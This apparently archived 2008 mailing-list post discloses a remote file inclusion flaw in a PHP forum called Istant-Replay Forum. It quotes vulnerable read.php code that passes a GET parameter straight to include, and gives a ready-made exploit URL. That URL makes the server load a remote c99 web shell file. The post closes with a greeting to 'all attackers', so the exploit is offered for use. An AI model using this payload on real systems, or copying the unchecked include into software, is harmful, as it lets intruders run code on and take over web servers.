remote file include

win32 . exe Tue, 15 Apr 2008 14:06:32 -0700

#########################################################################

        Istant-Replay Forum  Remote File Inclusion Vulnerability


#########################################################################



## AUTHOR: THuGM4N

## Email : [EMAIL PROTECTED]


## Script : Istant-Replay Forum                  


## Site   : http://www.chattaitaliano.com


## Vulnerable CODE :

~~~~~~~~~~/read.php ~~~~~~~~~~~~~~~~~~~~~~

$a = $_GET['data'];

$b = $_GET['post'];


$foo = include "$a.txt";

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



## BUT THE EXPLOIT IS LIKE THAT  :


http://[localhost]/[forum]/read.php?data=http://127.0.0.1/c99.txt?

 


##  BIGUP 2 All Attackers Around The World .


#########################################################################

      Istant-Replay Forum  Remote File Inclusion Vulnerability

#########################################################################

remote file include

Reply via email to